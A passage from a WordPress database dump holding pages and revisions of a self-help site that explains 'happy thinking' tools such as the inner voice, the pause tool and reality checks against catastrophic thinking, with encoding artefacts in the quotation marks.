(1646, 1, '2023-05-30 18:19:52', '2023-05-30 18:19:52', '<!-- wp:paragraph -->\n<p>As mentioned before, â€œHappy Thinkingâ€ is about dealing with unhelpful thinking patterns using â€œtoolsâ€. However, the tools one uses to deal with oneâ€™s mind are obviously not real metal tools like what a mechanic might use! One cannot open up oneâ€™s skull to work on oneâ€™s mind (please do not even try!). Luckily a more practical option is however available to all of us, and that is to use oneâ€™s inner voice to â€œtalkâ€ to oneâ€™s mind and change how it thinks. This is not as strange as you may imagine. Everyone has an inner voice which is the voice you use when â€œthinkingâ€ to yourself. For example when you look out of a window, your â€œvoiceâ€ might tell you, â€œWow, this view is so beautifulâ€. In some people, this voice is quite obvious all the time, whereas, in others, it may mostly be subtle and relatively silent. One may â€œhearâ€ oneâ€™s inner voice when one reads and perhaps you can hear your inner voice right now as you read this very sentence!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We all can listen to our inner voice. For example, if I ask you to silently tell yourself the answer to the hopefully simple mathematical problem, â€œ4 + 4 = ?â€, it''s your inner voice that will speak to you and say â€œ8â€.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Many tools in happy thinking will use oneâ€™s inner voice to deal with oneâ€™s thoughts. Itâ€™s sort of like talking to oneself, but doing so inside oneâ€™s mind rather than speaking words out loud. In the next section, I will discuss with you the â€œpause toolâ€ and this will make it clear to you how you can use your inner voice to deal with thoughts in your mind.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/psychological-tools/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/pause/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Inner voice', '', 'publish', 'closed', 'closed', '', 'inner-voice', '', '', '2023-08-09 18:29:58', '2023-08-09 18:29:58', '', 0, 'https://www.happythinking.com/?page_id=1646', 0, 'page', '', 0),
(1648, 1, '2023-05-30 18:21:25', '2023-05-30 18:21:25', '<!-- wp:paragraph -->\n<p>Happy thinking is about dealing with unhelpful thoughts using â€œtoolsâ€. However, the tools one uses to deal with oneâ€™s mind are obviously not real metal tools like what a mechanic might use! One cannot open up oneâ€™s skull to work on oneâ€™s mind (please do not try!). Luckily a more practical option is however available to all of us, and that is to use oneâ€™s inner voice to â€œtalkâ€ to oneâ€™s mind. This is not as strange as you may imagine. Everyone has an inner voice, which in some can be quite obvious whereas in others it may stay mostly in the background. One may â€œhearâ€ oneâ€™s inner voice when one reads. Perhaps you can hear your inner voice right now as you read this very sentence!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Many tools in happy thinking will make use of oneâ€™s inner voice to deal with thoughts. Itâ€™s sort of like talking to oneself, but doing so inside oneâ€™s mind rather than speaking words out loud. Oneâ€™s inner voice, even though silent to those around oneself, is actually a very powerful force to deal with unhelpful thoughts. In some sense, a lot of unhappiness is due to people not talking to themselves! One may talk to hundreds of people, and yet forget to talk to oneself.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/psychological_tools/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Inner voice', '', 'inherit', 'closed', 'closed', '', '1646-revision-v1', '', '', '2023-05-30 18:21:25', '2023-05-30 18:21:25', '', 1646, 'https://www.happythinking.com/?p=1648', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(1647, 1, '2023-05-30 18:19:52', '2023-05-30 18:19:52', '<!-- wp:paragraph -->\n<p>In our day to day lives, we all keep an eye out for things that may harm us. This assessment of the world around us for danger is essential for oneâ€™s â€œsurvivalâ€ and is built into our brains. It is probably something that has carried over from the time of our distant ancestors, who in their forest environment, would have had to keep a keen eye for lurking dangers such as poisonous snakes and tigers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, this system for assessing dangers can work in an exaggerated way in some people, leading to unhelpful thinking patterns in them. I will now explain one such unhelpful thinking pattern which psychologists call â€œcatastrophic thinkingâ€. Let me use an example to explain it. Imagine that a person has a teenage daughter and that she is fifteen minutes beyond the time she usually arrives home from school. While many parents will start to be concerned when their child is late returning from school, a parent with catastrophic thinking will straight away think of only the worst possible outcome. For example, a parent with catastrophic thinking may immediately think, â€œOh no, my daughter must have met with a road traffic accident and may be bleeding to death at this very moment.â€ whereas, a parent without such thinking may think instead, â€œMaybe there is very heavy traffic on the roads, and the school bus may have got held up.â€ In fact, with catastrophic thinking, the person may add further layers of â€œworst outcomeâ€ scenarios. Continuing from the example I just gave, the further added scenarios may go like this, â€œAnd with the loss of my daughter, I would become extremely depressed, making me lose my partner and job. I will end up being homeless and sleeping on the streetâ€. With such a catastrophic imagination, the person will undergo immense unnecessary stress, probably further compromising the person''s ability to think rationally. And all this stress happens without the person having any idea of what actually has happened (By the way, in our example, the daughter was indeed stuck in the bus, in heavy traffic!). This is not to say that one should not be concerned about oneâ€™s children. Rather, it''s about having a measured level of concern. In the example, perhaps instead of imagining the worst, a better approach would have been to say look up online to see for traffic reports in the area etc.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A common theme that you will see when I discuss unhelpful thinking is that it often has to do with one not â€œseeing things the way they really areâ€. What I mean is that our brains often distort the true situation that is really present. In the example given before, yes there was a reason for the person to be concerned that his or her daughter was late, but then the thinking became unhelpful when the person''s brain exaggerated the true risk. Without further information, there was no reason for the brain to imagine the worst outcomes. An important part of happy thinking is about developing the ability to see things the way they are, rather than having an imaginary view.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity_effect/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Inner voice', '', 'inherit', 'closed', 'closed', '', '1646-revision-v1', '', '', '2023-05-30 18:19:52', '2023-05-30 18:19:52', '', 1646, 'https://www.happythinking.com/?p=1647', 0, 'revision', '', 0),
(1649, 1, '2023-05-30 18:21:59', '2023-05-30 18:21:59', '<!-- wp:paragraph -->\n<p>In the past sections, we went through common unhelpful thinking patterns that can contribute to one being unhappy. Now that you understand these unhelpful thinking patterns you will be able to recognise such thinking when it happens in your own mind. However, while recognition itself might make you feel better, the real changes will only come when you are able to change unhelpful thinking patterns into more helpful thinking patterns.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It would have been wonderful if there was a magical brain surgeon who could magically rewire our brains so that we would be able to think in more helpful ways. Unfortunately, such magical surgeons do not exist, and I doubt something like that would be even possible in our lifetime. While scientific understanding of how our brains work has progressed hugely, we still know very little and there is a long way to go before seeing exactly how â€œthinkingâ€ happens. However, luckily for us, the human mind has an amazing power, which is the power to heal itself. Our minds have the ability to analyse our thoughts and change themselves.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So how can oneâ€™s mind change itself? This one can be done using â€œtoolsâ€, something like how a car mechanic would use various tools to fix a car not running well. Of course, the tools one can use on the mind are not made of metal, but rather are made of psychological techniques that one can use to change how one thinks. In the next sections of this website, I will share with you these psychological tools which you can use to change your thinking into ways that promote happiness in you (i.e. Happy Thinking!).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some of the psychological tools will help you better detect when you are thinking in unhelpful ways. i.e. you will become more â€œsensitiveâ€ in detecting unhelpful thinking when it happens in your mind. Other tools will help you to change unhelpful thinking into helpful thinking.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some tools will be more useful to use right at the moment that you detect unhelpful thinking patterns in your mind, whereas other tools will be more useful at times when you are able to reflect on how you were thinking on the day. i.e. some tools are â€œimmediate useâ€ tools whereas others are â€œuse laterâ€ tools, to be used when you are relaxed.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When an engineer uses tools to fix a machine, they have to choose the correct tool. Not all tools will be useful to repair a given fault. Also, sometimes, a fault will need multiple tools to be used together. The use of psychological tools is no different. You will need to try various tools to see which one works for you. And also, you may well need to use more than one tool at the same time.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>You may find that some of the psychological tools may appear to be â€œsimpleâ€, and this may put you off. Do not confuse simple as being the same as being â€œineffectiveâ€! Many solutions in life do not have to be complex, and the key is to try and judge for yourself how useful or not useful something is. Do not prejudge, rather, give the tools a chance before putting them away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unhelpful thinking patterns can develop over many years and get entrenched into oneâ€™s mind, making oneâ€™s mind resist change. In the next sections of this website, you will embark on learning about the various psychological tools that I will share with you. As you start your journey, remember to open up your mind to change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/forgetting_gratitude/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/inner_voice/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Psychological tools', '', 'inherit', 'closed', 'closed', '', '1641-revision-v1', '', '', '2023-05-30 18:21:59', '2023-05-30 18:21:59', '', 1641, 'https://www.happythinking.com/?p=1649', 0, 'revision', '', 0),
(1650, 1, '2023-05-30 18:23:24', '2023-05-30 18:23:24', '<!-- wp:paragraph -->\n<p>Our minds are full of thoughts that whizz past in all directions in our heads. Some of these thoughts may be helpful for our well-being, but others may be unhelpful. Happy thinking is about applying tools to deal with the latter. However, it would be very difficult to meaningfully interact with such â€œspeedingâ€ thoughts. To engage with a thought, one needs to first â€œpauseâ€ it so that it can â€œhearâ€ one speaking to it. It''s a bit like when a child is crazily running around in a room, to speak to the child meaningfully, one will first need the child to cease running and become still. In the case of the child, one may shout her name loudly, â€œShelly!â€,&nbsp; and this would, at least briefly, make her pause her running around. Once one gets her attention, one may be able to engage with her, â€œShelly, itâ€™s time for dinner!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So how can one get the attention of a thought that is speeding along? The answer is to use oneâ€™s inner voice. As soon as one senses an unhelpful thinking pattern occurring in oneâ€™s mind, one can use oneâ€™s internal voice to say as strongly as possible, â€œPause!â€ What this does is to temporarily â€œfreezeâ€ the thought, so that oneâ€™s mind can engage with it before it continues to cause more unhelpful thoughts to be generated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let me explain this concept using an example that we used before when discussing the unhelpful thinking pattern, â€œcatastrophic thinkingâ€. In that example, a person called Susan has a teenage daughter who is fifteen minutes late returning home from school. Susan, with her catastrophic thinking, is straight away thinking of only the worst possible outcome, â€œOh no, my daughter must have met with a road traffic accident and may be bleeding to death at this very moment.â€ At this point, this thought is unhelpful because there is no information to say that an accident has actually happened, and there are so many other less serious options such as the school bus being stuck in traffic. Susanâ€™s mind is simply â€œassumingâ€ that an accident has happened, without having any evidence to suggest that assumption.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Susanâ€™s incorrect assumption is making her unnecessarily worry. However, she is aware that she suffers from anxiety and she has some suspicions that her thoughts are probably unhelpful. So her first step is to pause the thought, and she does this by using her internal voice and saying to her mind, â€œPauseâ€. This briefly pauses her unhelpful thought, â€œShe must have met with a horrendous road traffic accident.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Now if this was all that had to be done for unhelpful thinking patterns, i.e. just saying â€œpauseâ€, wouldnâ€™t that be great? A few â€œpausesâ€ and everything would be fine! As you have probably guessed, there are a few more steps needed. That is, once an unhelpful thinking pattern has been paused, one will need to use a few other simple tools to deal with the thought, and I will explain those tools in subsequent sections of this website. The concept of the pause tool is to simply pause a thought for a few seconds, giving just enough time for other tools to be used on the thought. If one did not do anything after pausing a thought, the thought would soon â€œunpauseâ€ and continue being unhelpful to the person.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some of you may think, â€œWhy not use the word â€˜stopâ€™ instead of the word â€˜pauseâ€™, as the former is a much more commanding word?â€ The reason is, perhaps like humans, thoughts do not â€˜likeâ€™ to follow orders! Let me demonstrate this using a simple psychological experiment that we can do right now. Are you ready? Ok. I am going to give you a super easy task now. For this task, you do not even have to move a finger! Here is your task: â€œPlease DO NOT think of a white rabbit.â€ I am sure you will agree that it is quite an easy task, where all I have asked you to do is not think of a white rabbit. However, I am quite sure that most of you would have failed this simple task and would have thought, at least briefly and vaguely, of a white rabbit! This is a very common finding and highlights how telling your thoughts to go away (e.g. by saying stopâ€) does not work, and even can have the opposite effect. That is why I named this tool the â€œpause toolâ€ rather than naming it the â€œstop toolâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The pause tool may appear simplistic, but once you combine it with the other tools that I will explain to you later, you will realise that it is actually quite powerful. The aim of the pause tool is to simply hold an unhelpful thought just long enough for other tools to engage with it. Donâ€™t underestimate the power of your inner voice!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/inner-voice/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/reality-check/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Pause tool', '', 'publish', 'closed', 'closed', '', 'pause', '', '', '2023-08-09 18:31:02', '2023-08-09 18:31:02', '', 0, 'https://www.happythinking.com/?page_id=1650', 0, 'page', '', 0),
(1651, 1, '2023-05-30 18:23:24', '2023-05-30 18:23:24', '', 'Pause tool', '', 'inherit', 'closed', 'closed', '', '1650-revision-v1', '', '', '2023-05-30 18:23:24', '2023-05-30 18:23:24', '', 1650, 'https://www.happythinking.com/?p=1651', 0, 'revision', '', 0),
(1654, 1, '2023-05-30 18:25:52', '2023-05-30 18:25:52', '<!-- wp:paragraph -->\n<p>Happy thinking is about dealing with unhelpful thoughts using â€œtoolsâ€. However, the tools one uses to deal with oneâ€™s mind are obviously not real metal tools like what a mechanic might use! One cannot open up oneâ€™s skull to work on oneâ€™s mind (please do not try!). Luckily a more practical option is however available to all of us, and that is to use oneâ€™s inner voice to â€œtalkâ€ to oneâ€™s mind. This is not as strange as you may imagine. Everyone has an inner voice, which in some can be quite obvious whereas in others it may stay mostly in the background. One may â€œhearâ€ oneâ€™s inner voice when one reads. Perhaps you can hear your inner voice right now as you read this very sentence!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Many tools in happy thinking will make use of oneâ€™s inner voice to deal with thoughts. Itâ€™s sort of like talking to oneself, but doing so inside oneâ€™s mind rather than speaking words out loud. Oneâ€™s inner voice, even though silent to those around oneself, is actually a very powerful force to deal with unhelpful thoughts. In some sense, a lot of unhappiness is due to people not talking to themselves! One may talk to hundreds of people, and yet forget to talk to oneself.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/psychological_tools/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/pause_tool/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Inner voice', '', 'inherit', 'closed', 'closed', '', '1646-revision-v1', '', '', '2023-05-30 18:25:52', '2023-05-30 18:25:52', '', 1646, 'https://www.happythinking.com/?p=1654', 0, 'revision', '', 0),
(1653, 1, '2023-05-30 18:25:11', '2023-05-30 18:25:11', '<!-- wp:paragraph -->\n<p>In our minds, various thoughts appear and quickly spread into different areas. These thoughts may be helpful thoughts or unhelpful thoughts, and happy thinking is about applying tools to deal with the unhelpful ones. However, it would be very difficult to meaningfully interact with such â€œspeedingâ€ thoughts. To engage with a thought, one needs to first pause it so that it can â€œhearâ€ you. It''s a bit like when a child is crazily running around in a room, to speak to the child meaningfully, one will first need the child to cease running and become still. In the case of the child, you may shout her name loudly, â€œShelly!â€,&nbsp; and this would, at least briefly, make her pause her running around. Once you get her attention, you may be able to engage with her, â€œShelly, itâ€™s time for dinner!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So how can one get the attention of a thought that is speeding along? The answer is to use oneâ€™s inner voice. As soon as one senses an unhelpful thought occurring in oneâ€™s mind, one can use oneâ€™s internal voice to say as strongly as possible, â€œPause!â€ What this does is to temporarily â€œfreezeâ€ the thought, so that oneâ€™s mind can engage with it before it continues to cause more unhelpful thoughts to be generated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let me explain this concept using an example. Letâ€™s imagine that a person, who we will call Jay, is a very anxious person and he is at his home waiting for his partner to return from work. He looks at the clock and notices that it''s ten minutes past the time that his partner normally returns home from work. Imagine that at this point, Jayâ€™s mind generates the following unhelpful thought, â€œShe must have met with a horrendous road traffic accident.â€ At this point, this thought is unhelpful because there is no information to say that an accident has actually happened, and there are so many other less serious options such as being stuck in traffic. Jayâ€™s mind is simply â€œassumingâ€ that an accident has happened, when actually, at this point there is no information to support that thought. So at this point, Jayâ€™s incorrect assumption is making him unnecessarily worry. Jay is aware that he suffers from anxiety and he has some suspicions that his thoughts are probably unhelpful. So his first step is to pause the thought, and he does this by using his internal voice and saying to his mind, â€œpauseâ€. This will briefly pause his unhelpful thought, â€œShe must have met with a horrendous road traffic accident.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Now if this all that had to be done for unhelpful thoughts, i.e. just saying â€œpauseâ€, wouldnâ€™t that be great? A few â€œpausesâ€ and everything would be fine! As you have probably guessed, there are a few more steps needed. That is, once an unhelpful thought has been paused, one will need to use a few other simple tools to deal with the thought, and I will explain those tools in subsequent sections of this website.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some of you may think, â€œWhy not use the word â€˜stopâ€™ instead of the word â€˜pauseâ€™, as the former is a much more commanding word?â€ The reason is, perhaps like humans, thoughts do not â€˜likeâ€™ to follow orders! Let me demonstrate this using a simple psychological experiment that we can do right now. Are you ready? Ok. I am going to give you a super easy task now. For this task, you do not even have to move a finger! Here is your task: â€œPlease DO NOT think of a white rabbit.â€ I am sure you will agree that it is quite an easy task, where all I have asked you to do is not think of a white rabbit. However, I am quite sure that most of you would have failed this simple task and would have thought, at least briefly and vaguely, of a white rabbit! This is a very common finding and highlights how telling your thoughts to go away (e.g. â€œby saying stopâ€) does not work, and even can have the opposite effect. That is why I named this tool the â€œpause toolâ€ rather than naming it the â€œstop toolâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The pause tool may appear simplistic, but once you combine it with the other tools that I will explain to you later, you will realise that it is actually quite powerful. The aim of the pause tool is to simply hold an unhelpful thought just long enough for other tools to engage with it. Donâ€™t underestimate the power of your inner voice!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/inner_voice/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Pause tool', '', 'inherit', 'closed', 'closed', '', '1650-revision-v1', '', '', '2023-05-30 18:25:11', '2023-05-30 18:25:11', '', 1650, 'https://www.happythinking.com/?p=1653', 0, 'revision', '', 0),
(1655, 1, '2023-05-30 18:28:34', '2023-05-30 18:28:34', '<!-- wp:paragraph -->\n<p>As you know by now, the main aim of happy thinking is to help one deal with unhelpful thinking patterns. A common feature of unhelpful thinking patterns is that often they are unhelpful because they distort reality. That is, such thoughts are based more on what one â€œimaginesâ€ the truth to be rather than what the truth actually is.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For a moment, letâ€™s assume that you are a judge in a court of law and that there is a person in front of you who has been accused of stealing a cake (I suppose it''s not the most serious of crimes, but this is only an example!). Now as a good and professional judge, it would be crazy for you to tell the accused, â€œHey, I â€˜imagineâ€™ that you must have stolen that cake, and therefore I declare that you are guilty.â€ There would be an uproar in the court because one needs to judge someone based on evidence rather than mere imagination.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, oneâ€™s mind can often rely on imagination rather than facts, and this can cause one to have a lot of unnecessary distress. People often make the mistake of assuming that their thoughts accurately represent reality, when actually, they often may not. This is where a tool which I call the â€œreality check toolâ€, can be very useful. With this tool, after using the pause tool to â€œpauseâ€ the unhelpful thought, one asks oneâ€™s mind, â€œHow much of this thought is based on real evidence and how much of this thought is based on imagination.â€ To understand the reality check tool, let us continue with our example from the previous section, where Sueâ€™s daughter was only fifteen minutes late returning home from school and she was having the unhelpful thought, â€œShe must have met with a terrible road traffic accidentâ€.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So how could Sue use the reality check tool in this situation? As mentioned before, Susan''s first step would be to use the â€œpause toolâ€ where she would use her internal voice to say â€œpauseâ€ to herself.&nbsp; She then applies the reality check tool to the paused thought, and asks herself, â€œWhat actual evidence do I 